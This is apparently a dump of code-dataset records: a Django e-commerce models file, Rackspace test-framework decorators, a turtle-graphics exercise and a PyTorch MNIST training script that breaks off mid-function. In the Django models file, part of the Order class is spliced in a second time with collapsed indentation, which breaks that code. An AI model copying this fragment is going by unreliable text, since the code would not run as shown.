'10'),\n        (11, '11'),\n        (12, '12'),\n        (13, '13'),\n        (14, '14'),\n        (15, '15'),\n    )\n    unit = models.CharField(max_length=150, choices=UNITS,\n                            default='K', blank=True, null=True)\n    title = models.CharField(max_length=150)\n    user = models.ForeignKey(\n        User, blank=True, null=True, on_delete=models.CASCADE, default=None)\n    description = models.TextField()\n    price = models.FloatField()\n    quantity = models.IntegerField(default=0, null=True, blank=False)\n    minorder = models.IntegerField(\n        help_text='Minimum number of products the seller will sell per order', null=True, default=None, blank=True)\n    image = models.ImageField()\n    delivery_days = models.IntegerField(\n        choices=DELIVERY_DAYS, blank=True, null=True, help_text='Select Minimum Delivery Days')\n    max_delivery_days = models.IntegerField(\n        choices=MAX_DELIVERY_DAYS, blank=True, null=True, help_text='Select Maximum Delivery Days')\n    category = models.ForeignKey(\n        Categories, default=1, on_delete=models.CASCADE)\n    deal_status = models.BooleanField(\n        default=False, help_text='Check this for displaying on home page')\n    deal_price = models.FloatField(\n        null=True, blank=True)\n    stock_status = models.CharField(max_length=150, choices=STOCK_STATUS,\n                                    default='IN-STOCK')\n    slug = models.SlugField(blank=True, unique=True)\n\n    def average_rating(self):\n        all_ratings = map(lambda x: x.rating, self.review_set.all())\n        return np.mean(list(all_ratings))\n\n    def __str__(self):\n        return self.title\n\n    @property\n    def get_price(self):\n        price = self.price\n        return price\n\n    @property\n    def get_deal_price(self):\n        deal_price = self.deal_price\n        return deal_price\n\n\ndef pre_save_product_post_receiever(sender, instance, *args, **kwargs):\n    if not instance.slug:\n        instance.slug = slugify(instance.user.username + \"-\" + instance.title)\n\n\npre_save.connect(pre_save_product_post_receiever, sender=Product)\n\n\nclass Review(models.Model):\n    RATING_CHOICES = (\n        (1, '1'),\n        (2, '2'),\n        (3, '3'),\n        (4, '4'),\n        (5, '5'),\n    )\n    product = models.ForeignKey(Product, on_delete=models.CASCADE)\n    pub_date = models.DateTimeField('date published')\n    user_name = models.CharField(max_length=100)\n    comment = models.CharField(max_length=200)\n    rating = models.IntegerField(\n        choices=RATING_CHOICES)\n\n\nclass Order(models.Model):\n    STATUS = (\n        ('Pending', 'Pending'),\n        ('Delivered', 'Delivered'),\n    )\n    STATUSFORBUYER = (\n        ('Not-Received', 'Not-Received'),\n        ('Received', 'Received'),\n    )\n    user = models.ForeignKey(\n        User, on_delete=models.CASCADE, blank=True, null=True)\n    date_orderd = models.DateTimeField(auto_now_add=True)\n    complete = models.BooleanField(default=False, null=True, blank=False)\n    transaction_id = models.CharField(max_length=200, null=True)\n    status = models.CharField(\n        max_length=200, null=True, blank=True, choices=STATUS, default='Pending')\n    statusforbuyer = models.CharField(\n        max_length=200, null=True, blank=True, choices=STATUSFORBUYER, default='Not-Received')\n\n    def __str__(self):\n        return str(self.id)\n\n
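    # The cart totals below are derived on demand from the related OrderItem\n    # rows (via the reverse orderitem_set manager) rather than stored on Order.\n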
max_length=200, null=True, blank=True, choices=STATUS, default='Pending')\n statusforbuyer = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORBUYER, default='Not-Received')\n\n def __str__(self):\n return str(self.id)\n\n @property\n def get_cart_total(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.get_total for item in orderitem)\n return total\n\n @property\n def get_deal_cart_total(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.get_deal_total for item in orderitem)\n return total\n\n @property\n def get_cart_items(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.quantity for item in orderitem)\n return total\n\n\nclass OrderItem(models.Model):\n STATUS = (\n ('0', '0'),\n ('1', '1'),\n )\n STATUSFORSELLER = (\n ('Pending', 'Pending'),\n ('Delivered', 'Delivered'),\n )\n STATUSFORBUYER = (\n ('Not-Received', 'Not-Received'),\n ('Received', 'Received'),\n )\n product = models.ForeignKey(\n Product, on_delete=models.CASCADE, blank=True, null=True)\n order = models.ForeignKey(\n Order, on_delete=models.SET_NULL, blank=True, null=True)\n quantity = models.IntegerField(default=0, null=True, blank=True)\n date_orderd = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(\n User, on_delete=models.SET_NULL, blank=True, null=True)\n price = models.FloatField(blank=True, null=True)\n feedback_status = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUS)\n status = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORSELLER, default='Pending')\n statusforbuyer = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORBUYER, default='Not-Received')\n\n def __str__(self):\n return str(self.product)\n\n @property\n def get_total(self):\n price = self.product.price\n quantity = self.quantity\n total = price*quantity\n print(total)\n\n return total\n\n @property\n def get_deal_total(self):\n price = self.product.deal_price\n quantity = self.quantity\n total = price*quantity\n print(total)\n\n return total\n\n\nclass ShippingAddress(models.Model):\n user = models.ForeignKey(\n User, on_delete=models.CASCADE, blank=True, null=True)\n order = models.ForeignKey(\n Order, on_delete=models.CASCADE, blank=True, null=True)\n name = models.CharField(max_length=150)\n address = models.CharField(max_length=150)\n city = models.CharField(max_length=150)\n state = models.CharField(max_length=150)\n zipcode = models.CharField(max_length=150)\n date_orderd = models.DateTimeField(auto_now_add=True)\n ph_number = models.CharField(\n validators=[MinLengthValidator(11)], max_length=11)\n\n def __str__(self):\n return self.address\n\n\nclass Wishlist(models.Model):\n # here CASCADE is the behavior to adopt when the referenced object(because it is a foreign key) is deleted. 
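For this model that means deleting the related User or Product also deletes the Wishlist row. 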
It is not specific to Django; this is an SQL standard.\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    wished_item = models.ForeignKey(Product, on_delete=models.CASCADE)\n    added_date = models.DateTimeField(auto_now_add=True)\n\n    def __str__(self):\n        return self.wished_item.title\n","sub_path":"products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"372837796","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport collections\nimport inspect\nimport itertools\n\nfrom types import FunctionType\nfrom unittest import TestCase\nfrom warnings import warn, simplefilter\n\nfrom cafe.common.reporting import cclogging\n\nTAGS_DECORATOR_TAG_LIST_NAME = \"__test_tags__\"\nTAGS_DECORATOR_ATTR_DICT_NAME = \"__test_attrs__\"\nDATA_DRIVEN_TEST_ATTR = \"__data_driven_test_data__\"\nDATA_DRIVEN_TEST_PREFIX = \"ddtest_\"\n\n\nclass DataDrivenFixtureError(Exception):\n    pass\n\n\ndef tags(*tags, **attrs):\n    \"\"\"Adds tags and attributes to tests, which are interpreted by the\n    cafe-runner at run time\n    \"\"\"\n    def decorator(func):\n        setattr(func, TAGS_DECORATOR_TAG_LIST_NAME, [])\n        setattr(func, TAGS_DECORATOR_ATTR_DICT_NAME, {})\n        func.__test_tags__.extend(tags)\n        func.__test_attrs__.update(attrs)\n        return func\n    return decorator\n\n\ndef data_driven_test(*dataset_sources, **kwargs):\n    \"\"\"Used to define the data source for a data driven test in a\n    DataDrivenFixture decorated Unittest TestCase class\"\"\"\n\n    def decorator(func):\n        # dataset_source checked for backward compatibility\n        combined_lists = kwargs.get(\"dataset_source\") or []\n        for list_ in dataset_sources:\n            combined_lists += list_\n        setattr(func, DATA_DRIVEN_TEST_ATTR, combined_lists)\n        return func\n    return decorator\n\n\ndef DataDrivenFixture(cls):\n    \"\"\"Generates new unittest test methods from methods defined in the\n    decorated class\"\"\"\n\n    if not issubclass(cls, TestCase):\n        raise DataDrivenFixtureError\n\n    test_case_attrs = dir(cls)\n    for attr_name in test_case_attrs:\n        if attr_name.startswith(DATA_DRIVEN_TEST_PREFIX) is False:\n            # Not a data driven test, skip it\n            continue\n\n        original_test = getattr(cls, attr_name, None).__func__\n        test_data = getattr(original_test, DATA_DRIVEN_TEST_ATTR, None)\n\n        if test_data is None:\n            # no data was provided to the datasource decorator or this is not a\n            # data driven test, skip it.\n            continue\n\n        for dataset in test_data:\n            # Name the new test based on original and dataset names\n            base_test_name = str(original_test.__name__)[\n                int(len(DATA_DRIVEN_TEST_PREFIX)):]\n            new_test_name = \"test_{0}_{1}\".format(\n                base_test_name, dataset.name)\n\n            # Create a new test from the old test\n            new_test = FunctionType(\n                original_test.func_code, original_test.func_globals,\n                name=new_test_name)\n\n            # Copy over any other attributes the original test had (mainly to\n            # support test tag decorator)\n            for attr in 
list(set(dir(original_test)) - set(dir(new_test))):\n setattr(new_test, attr, getattr(original_test, attr))\n\n # Change the new test's default keyword values to the appropriate\n # new data as defined by the datasource decorator\n args, _, _, defaults = inspect.getargspec(original_test)\n\n # Self doesn't have a default, so we need to remove it\n args.remove('self')\n\n # Make sure we take into account required arguments\n kwargs = dict(\n itertools.izip_longest(\n args[::-1], list(defaults or ())[::-1], fillvalue=None))\n\n kwargs.update(dataset.data)\n\n # Make sure the updated values are in the correct order\n new_default_values = [kwargs[arg] for arg in args]\n setattr(new_test, \"func_defaults\", tuple(new_default_values))\n\n # Add the new test to the decorated TestCase\n setattr(cls, new_test_name, new_test)\n return cls\n\n\ndef skip_open_issue(type, bug_id):\n simplefilter('default', DeprecationWarning)\n warn('cafe.drivers.unittest.decorators.skip_open_issue() has been moved '\n 'to cafe.drivers.unittest.issue.skip_open_issue()',\n DeprecationWarning)\n\n try:\n from cafe.drivers.unittest.issue import skip_open_issue as skip_issue\n return skip_issue(type, bug_id)\n except ImportError:\n print ('* Skip on issue plugin is not installed. Please install '\n 'the plugin to use this functionality')\n return lambda obj: obj\n\n\nclass memoized(object):\n\n \"\"\"\n Decorator.\n @see: https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize\n Caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned\n (not reevaluated).\n\n Adds and removes handlers to root log for the duration of the function\n call, or logs return of cached result.\n \"\"\"\n\n def __init__(self, func):\n self.func = func\n self.cache = {}\n self.__name__ = func.func_name\n\n def __call__(self, *args):\n log_name = \"{0}.{1}\".format(\n cclogging.get_object_namespace(args[0]), self.__name__)\n self._start_logging(log_name)\n if not isinstance(args, collections.Hashable):\n # uncacheable. a list, for instance.\n # better to not cache than blow up.\n value = self.func(*args)\n self.func._log.debug(\"Uncacheable. 
Data returned\")\n self._stop_logging()\n return value\n\n if args in self.cache:\n self.func._log.debug(\"Cached data returned.\")\n self._stop_logging()\n return self.cache[args]\n\n else:\n value = self.func(*args)\n self.cache[args] = value\n self.func._log.debug(\"Data cached for future calls\")\n self._stop_logging()\n return value\n\n def __repr__(self):\n \"\"\"Return the function's docstring.\"\"\"\n return self.func.__doc__\n\n def _start_logging(self, log_file_name):\n setattr(self.func, '_log_handler', cclogging.setup_new_cchandler(\n log_file_name))\n setattr(self.func, '_log', cclogging.getLogger(''))\n self.func._log.addHandler(self.func._log_handler)\n try:\n curframe = inspect.currentframe()\n self.func._log.debug(\"{0} called from {1}\".format(\n self.__name__, inspect.getouterframes(curframe, 2)[2][3]))\n except:\n self.func._log.debug(\n \"Unable to log where {0} was called from\".format(\n self.__name__))\n\n def _stop_logging(self):\n self.func._log.removeHandler(self.func._log_handler)\n","sub_path":"cafe/drivers/unittest/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"620202196","text":"# a201 name : eegbunam iu username : ebuka egbunam\n\nimport turtle\nfrom turtle import *\negb = turtle.Turtle()\negb.penup()\n\ndef draw(pX , pY , pColor):\n ''' takes pX, pY, and pColor, to draws a colored point at integer coordinates (pX,pY)\n number , number , string -> turtle points '''\n\n# no need to assign to result but i decided to because it makes it clearer for me \n result = egb.goto( pX , pY )\n result = egb.dot( 4, pColor)\n return result\n\n\n\n# uses the draw function to draw points \ndraw(30 , 100 , \"green\")\n\ndraw(200 , 200 , \"red\")\n\n\n\n\n \n \n","sub_path":"pa-11-points 2.01.58 AM.py","file_name":"pa-11-points 2.01.58 AM.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79778762","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport PIL\nimport pickle\n\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.manifold import TSNE\nimport seaborn as sn\nimport pandas as pd\nfrom math import log\nimport math\n\n\nrandom.seed(2020)\ntorch.manual_seed(2020)\n\n\nimport os\n\n'''\nThis code is adapted from two sources:\n(i) The official PyTorch MNIST example (https://github.com/pytorch/examples/blob/master/mnist/main.py)\n(ii) Starter code from Yisong Yue's CS 155 Course (http://www.yisongyue.com/courses/cs155/2020_winter/)\n'''\n\nclass fcNet(nn.Module):\n '''\n Design your model with fully connected layers (convolutional layers are not\n allowed here). Initial model is designed to have a poor performance. 
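As written, forward() applies only fc1 (fc2 is defined but never called), so the log-softmax runs over 20 units rather than 10 classes. 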
These\n are the sample units you can try:\n Linear, Dropout, activation layers (ReLU, softmax)\n '''\n def __init__(self):\n # Define the units that you will use in your model\n # Note that this has nothing to do with the order in which operations\n # are applied - that is defined in the forward function below.\n super(fcNet, self).__init__()\n self.fc1 = nn.Linear(in_features=784, out_features=20)\n self.fc2 = nn.Linear(20, 10)\n self.dropout1 = nn.Dropout(p=0.5)\n\n def forward(self, x):\n # Define the sequence of operations your model will apply to an input x\n x = torch.flatten(x, start_dim=1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout1(x)\n x = F.relu(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n\nclass ConvNet(nn.Module):\n '''\n Design your model with convolutional layers.\n '''\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(3,3), stride=1)\n self.conv2 = nn.Conv2d(8, 8, 3, 1)\n self.dropout1 = nn.Dropout2d(0.5)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(200, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout2(x)\n\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n\n'''\nclass ConvNet(nn.Module):\n\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(3,3), stride=1)\n self.conv2 = nn.Conv2d(8, 8, 3, 1)\n self.dropout1 = nn.Dropout2d(0.5)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(200, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout2(x)\n\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n'''\n\n\nclass Net(nn.Module):\n '''\n COmpared with teh convnet, this has a 3rd linear layer and doubles the number of the convolution in the 2nd convolution layer\n '''\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, out_channels=8, kernel_size=(3, 3), stride=1)\n self.conv15 = nn.Conv2d(8, out_channels=16, kernel_size=(3, 3), stride=1)\n #self.conv2 = nn.Conv2d(8, 16, 3, 1)\n self.conv2 = nn.Conv2d(16, 32, 3, 1)\n\n #self.dropout1 = nn.Dropout2d(0.5)\n #self.dropout2 = nn.Dropout2d(0.5)\n\n # follow dimensions:\n # conv1 takes 28 to 26\n # maxpool takes 26 to 13\n # conv2 takes 13 to 11\n # maxpool takes 11 to 5\n\n #self.fc1 = nn.Linear(16 * 5 * 5, 120)\n #self.fc1 = nn.Linear(32 * 4 * 4, 120)\n self.fc1 = nn.Linear(32 * 22 * 22, 3000)\n self.fc15 = nn.Linear(3000, 600)\n self.fc16 = nn.Linear(600, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.dropout1 = nn.Dropout2d(0.3)\n self.dropout2 = nn.Dropout2d(0.3)\n\n\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv15(x)\n x = F.relu(x)\n x = self.dropout2(x)\n #x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n\n size = x.size()[1:]\n dims = 1\n for s in size:\n dims *= s\n x = x.view(-1, dims)\n\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc15(x)\n x = 
F.relu(x)\n\n x = self.fc16(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n xf = self.fc3(x)\n\n\n output = F.log_softmax(xf, dim=1)\n return output, x\n\n\nclass Net2(nn.Module):\n '''\n COmpared with the convnet, this has a 3rd linear layer and doubles the number of the convolution in the 2nd convolution layer\n '''\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, out_channels=8, kernel_size=(3, 3), stride=1)\n self.conv15 = nn.Conv2d(8, out_channels=16, kernel_size=(3, 3), stride=1)\n #self.conv2 = nn.Conv2d(8, 16, 3, 1)\n self.conv2 = nn.Conv2d(16, 32, 3, 1)\n\n #self.dropout1 = nn.Dropout2d(0.5)\n #self.dropout2 = nn.Dropout2d(0.5)\n\n # follow dimensions:\n # conv1 takes 28 to 26\n # maxpool takes 26 to 13\n # conv2 takes 13 to 11\n # maxpool takes 11 to 5\n\n #self.fc1 = nn.Linear(16 * 5 * 5, 120)\n #self.fc1 = nn.Linear(32 * 4 * 4, 120)\n self.fc1 = nn.Linear(32 * 22 * 22, 3000)\n self.fc15 = nn.Linear(3000, 600)\n self.fc16 = nn.Linear(600, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.dropout1 = nn.Dropout2d(0.2)\n self.dropout2 = nn.Dropout2d(0.2)\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv15(x)\n x = F.relu(x)\n x = self.dropout2(x)\n #x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n\n size = x.size()[1:]\n dims = 1\n for s in size:\n dims *= s\n x = x.view(-1, dims)\n\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc15(x)\n x = F.relu(x)\n\n x = self.fc16(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n\n\n xf = self.fc3(x)\n\n\n output = F.log_softmax(xf, dim=1)\n return output, x\n\ndef train(args, model, device, train_loader, optimizer, epoch):\n '''\n This is your training function. When you call this function, the model is\n trained for 1 epoch.\n '''\n model.train() # Set the model to training mode\n total_loss = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad() # Clear the gradient\n output, hidden_layer = model(data) # Make predictions\n loss = F.nll_loss(output, target) # Compute loss\n loss.backward() # Gradient computation\n optimizer.step() # Perform a single optimization step\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.sampler),\n 100. 
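# percent of this epoch's batches processed so far\n                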
* batch_idx / len(train_loader), loss.item()))\n\n total_loss = total_loss + loss.item()\n #train loss for each epoch is an average of the loss over all mini-batches\n train_loss = total_loss/batch_idx\n\n return train_loss\n\n\ndef test(model, device, test_loader, evaluate = False):\n model.eval() # Set the model to inference mode\n test_loss = 0\n correct = 0\n test_num = 0\n\n images = []\n allimages = []\n master_preds = []\n master_truths = []\n master_hidden_layers = []\n with torch.no_grad(): # For the inference step, gradient is not computed\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output, hidden_layer = model(data)\n\n #feature_extractor = torch.nn.Sequential(*list(model.children())[:-1])\n\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n\n print(len(hidden_layer))\n print(len(hidden_layer[0]))\n #print(hidden_layer[0])\n\n\n correct += pred.eq(target.view_as(pred)).sum().item()\n test_num += len(data)\n\n\n if evaluate:\n for i in range(len(pred)):\n master_preds.append(pred[i][0].item())\n master_truths.append(target[i].item())\n layer = hidden_layer[i].cpu()\n master_hidden_layers.append(layer.numpy())\n image = data[i][0].cpu()\n allimages.append(image.numpy())\n if pred[i][0] == target[i]:\n continue\n else:\n #print(\"not equal\")\n #print(\"pred is \", pred[i][0].item(), \"and target is \", target[i].item())\n image = data[i][0].cpu()\n images.append([image.numpy(),pred[i][0].item(),target[i].item()])\n\n if evaluate:\n\n #print(len(master_hidden_layers))\n #print(master_hidden_layers[0])\n\n distances = np.zeros(len(master_hidden_layers))\n\n #x0 = master_hidden_layers[0]\n\n for i in range(len(distances)):\n length = 0\n for dim in range(len(master_hidden_layers[0])):\n length = length + (master_hidden_layers[i][dim] - master_hidden_layers[15][dim])**2\n length = math.sqrt(length)\n distances[i] = length\n\n sorted_distance_index = np.argsort(distances)\n\n figa = plt.figure()\n\n\n print(\"test\")\n for i in range(9):\n sub = figa.add_subplot(9, 1, i + 1)\n sub.imshow(allimages[sorted_distance_index[i]], interpolation='nearest', cmap='gray')\n\n X = master_hidden_layers\n y = np.array(master_truths)\n tsne = TSNE(n_components=2, random_state=0)\n X_2d = np.array(tsne.fit_transform(X))\n\n target_ids = range(10)\n\n cdict = {0: 'orange', 1: 'red', 2: 'blue', 3: 'green', 4: 'salmon', 5:'c', 6: 'm', 7: 'y', 8: 'k', 9: 'lime'}\n\n fig, ax = plt.subplots()\n for g in np.unique(y):\n ix = np.where(y == g)\n ax.scatter(X_2d[ix, 0], X_2d[ix, 1], c=cdict[g], label=g, s=5)\n ax.legend()\n plt.show()\n\n\n #i = 1\n #plt.figure(figsize=(6, 5))\n #plt.scatter(X_2d[10*i:10*i+10,0],X_2d[:10,1])\n\n\n\n CM = confusion_matrix(master_truths,master_preds)\n CMex = CM\n #for i in range(len(CM)):\n # for j in range(len(CM)):\n # if CM[i][j] > 0:\n # CMex[i][j] = log(CM[i][j])\n # else:\n # CMex[i][j] = CM[i][j]\n\n print(CM)\n print(CMex)\n\n df_cm = pd.DataFrame(CM, range(10), range(10))\n #plt.figure(figsize=(10,7))\n fig0,ax0 = plt.subplots(1)\n sn.set(font_scale=1) # for label size\n sn.heatmap(df_cm, annot=True, annot_kws={\"size\": 11}) # font size\n #ax0.set_ylim(len(CMex) - 0.5, 0.5)\n plt.xlabel(\"predicted\")\n plt.ylabel(\"ground truth\")\n plt.show()\n\n\n\n\n fig = plt.figure()\n\n for i in range(9):\n sub = fig.add_subplot(3, 3, i + 1)\n sub.imshow(images[i + 10][0], interpolation='nearest', 
cmap='gray')\n\n title = \"Predicted: \" + str(images[i+ 10][1]) + \" True: \" + str(images[i+ 10][2])\n sub.set_title(title)\n\n kernels = model.conv1.weight.cpu().detach().clone()\n kernels = kernels - kernels.min()\n kernels = kernels / kernels.max()\n\n kernels = kernels.numpy()\n print(np.shape(kernels))\n\n fig2 = plt.figure()\n for i in range(8):\n\n sub = fig2.add_subplot(2, 4, i + 1)\n sub.imshow(kernels[i][0], interpolation='nearest', cmap='gray')\n\n title = \"Kernel #\" + str(i + 1)\n sub.set_title(title)\n\n\n #fig, axs = plt.subplots(3, 3, constrained_layout=True)\n #for i in range(9):\n # fig[i].imshow(images[i][0], interpolation='nearest', cmap='gray')\n # axs[i].set_title(\"all titles\")\n\n\n\n\n\n test_loss /= test_num\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n test_loss, correct, test_num,\n 100. * correct / test_num))\n\n return test_loss\n\n\ndef main():\n # Training settings\n # Use the command line to modify the default settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=14, metavar='N',\n help='number of epochs to train (default: 14)')\n parser.add_argument('--lr', type=float, default=1.0, metavar='LR',\n help='learning rate (default: 1.0)')\n parser.add_argument('--step', type=int, default=1, metavar='N',\n help='number of epochs between learning rate reductions (default: 1)')\n parser.add_argument('--gamma', type=float, default=0.7, metavar='M',\n help='Learning rate step gamma (default: 0.7)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--evaluate', action='store_true', default=False,\n help='evaluate your model on the official test set')\n parser.add_argument('--load-model', type=str,\n help='model file path')\n\n parser.add_argument('--save-model', action='store_true', default=True,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # Evaluate on the official test set\n if args.evaluate:\n assert os.path.exists(args.load_model)\n\n # Set the test model\n model = Net().to(device)\n model.load_state_dict(torch.load(args.load_model))\n\n test_dataset = datasets.MNIST('../data', train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n test(model, device, test_loader, evaluate = True)\n\n return\n\n # Pytorch has default MNIST dataloader which loads data at each iteration\n train_dataset = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([ # Data preprocessing\n transforms.ToTensor(), # Add data 
augmentation here\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n train_dataset_augmented = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([ # Data preprocessing\n #transforms.RandomCrop(28, padding=(1, 1, 1, 1)),\n #transforms.RandomRotation(4, resample=PIL.Image.BILINEAR),\n #transforms.RandomResizedCrop(28, scale=(0.85, 1.0), ratio=(1, 1),\n # interpolation=2),\n transforms.RandomAffine(8, translate=(.065, .065), scale=(0.80, 1.1),\n resample=PIL.Image.BILINEAR),\n transforms.ToTensor(), # Add data augmentation here\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n print(type(train_dataset))\n print(len(train_dataset), type(train_dataset[0][0]), type(train_dataset[0][1]), type(train_dataset[0]))\n\n print(\"the int is: \", train_dataset[2][1])\n print(np.shape(train_dataset[0][0][0].numpy()))\n\n idx = [[] for i in range(10)]\n #each row of indexes is a list of indexes in the train_dataset\n #e.g. row 5 containes a list of indexes for the places in train_dataset with images of 5\n print(idx[4])\n for i, img in enumerate(train_dataset):\n\n #if False:\n if i < 5:\n fig = plt.figure()\n plt.imshow(img[0][0].numpy(), cmap='gray')\n\n fig = plt.figure()\n plt.imshow(train_dataset_augmented[i][0][0].numpy(), cmap='gray')\n\n for number in range(10):\n if img[1] == number:\n idx[number].append(i)\n\n\n val_idx = [[] for i in range(10)]\n train_idx = [[] for i in range(10)]\n #print(idx[0][1:100])\n\n for i, number_indx in enumerate(idx):\n random.shuffle(number_indx)\n l = len(number_indx)\n idx_lim = int(l*0.15)\n val_idx[i] = number_indx[0:idx_lim]\n train_idx[i] = number_indx[idx_lim:]\n\n\n subset_indices_train = [j for sub in train_idx for j in sub]\n subset_indices_valid = [j for sub in val_idx for j in sub]\n\n\n # for adjusting size of train set\n\n train_length = int(len(subset_indices_train))\n #train_length = int(len(subset_indices_train)/2)\n #train_length = int(len(subset_indices_train) / 4)\n #train_length = int(len(subset_indices_train) / 8)\n #train_length = int(len(subset_indices_train) / 16)\n\n\n\n\n # You can assign indices for training/validation or use a random subset for\n # training by using SubsetRandomSampler. Right now the train and validation\n # sets are built from the same indices - this is bad! 
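(validating on training examples inflates the validation score). 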
